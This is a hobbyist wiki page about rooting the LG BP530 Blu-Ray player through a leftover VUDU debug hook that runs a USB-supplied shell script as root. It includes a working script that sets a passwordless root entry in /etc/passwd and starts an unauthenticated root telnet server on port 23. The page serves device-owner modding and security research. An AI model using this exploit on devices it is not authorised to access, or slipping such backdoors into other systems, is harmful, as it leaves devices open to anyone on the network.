LG BP530​​

From Exploitee.rs
Revision as of 01:22, 7 February 2016 by Resno (Talk | contribs)

(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to: navigation, search

"Although the information we release has been verified and shown to work to the best our knowledge, we cant be held accountable for bricked devices or roots gone wrong."

LG-BP530.jpg

This page will be dedicated to a general overview, descriptions, and information related to the LG BP530​​ Blu-Ray player.

Purchase

Buying devices is expensive and, in a lot of cases our testing leads to bricked equipment. If you would like to help support our group, site, and research please use one of the links below to purchase your next device. Purchase the LG BP530​​ Blu-Ray Player at Amazon

GPL

You can find GPL code for the LG BP530​​ Here

Exploitation

A bug exists in the MTK supplied SDK which affects many Blu-Ray players, including the BP530. ​ The main binary, which controls all aspects of the player has leftover debug instructions for the VUDU app. When the VUDU app is run, if a file exists named "vudu.txt" , in a directory labeled "vudu" on a FAT formatted flash drive it will attempt to execute "vudu/vudu.sh", and deletes vudu.txt. It runs this sh as root. Using the commands below, you can spawn a root telnet shell, allowing access to the device:

  • Create a folder named "vudu" on a FAT formatted flash drive.
  • Inside that folder, create a blank file named "vudu.txt"
  • Also in that folder, create a file named "vudu.sh" containing the following:
#!/bin/sh

echo "executing" > /mnt/sda1/vudu.txt
mount -t overlayfs -o overlayfs /etc/passwd
echo "root::0:0:root:/root:/bin/sh" > /etc/passwd

/mnt/rootfs_normal/usr/sbin/telnetd

  • Start the player with the flash drive plugged in, and execute the VUDU app. The code has been executed, and a telnet shell now exists for you to connect to on port 23 as root. Following this, you will be brought back to the main menu.